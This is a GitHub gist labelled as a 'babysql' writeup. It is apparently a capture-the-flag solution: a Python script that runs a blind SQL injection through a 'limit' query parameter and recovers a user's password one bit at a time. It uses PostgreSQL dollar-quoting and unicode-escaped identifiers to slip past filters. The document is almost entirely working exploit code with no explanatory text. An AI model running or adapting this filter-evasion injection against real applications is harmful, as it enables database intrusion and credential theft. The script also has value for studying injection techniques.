Skip to content

Instantly share code, notes, and snippets.

@shpik-kr
Created September 15, 2019 01:27
Show Gist options
  • Save shpik-kr/a3e3746947cc76a090e4db7e8fdf244c to your computer and use it in GitHub Desktop.
Save shpik-kr/a3e3746947cc76a090e4db7e8fdf244c to your computer and use it in GitHub Desktop.
babysql writeup
import requests
import urllib
import json
url = lambda x:"http://mashiro.kr:13000/search?limit=%s"%urllib.quote(x)
cnt = 0
pw = ''
for i in range(1,33):
tmp = 0
for offset in range(1,5):
cnt += 1
query = '(select 0 where (select b from (select substr((select concat($$x$$,substr(U&"\\0070\\0077",%d,1)::char)::bit(4))::text,%d,1) as b,ip from users where U&"\\0069\\0064" like $$mashiro$$) as a where a.ip like $$%%111.101.197.149%%$$)=$$0$$)'%(i,offset)
r = requests.get(url(query))
output = json.loads(r.text)
if 'items' in output.keys():
if(len(output['items'])):
tmp += 1 << (4-offset)
else:
print output
print 'Error Occured!'
exit(0)
pw += hex(tmp).replace('0x','')
print pw
print 'total count :',cnt
print pw
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment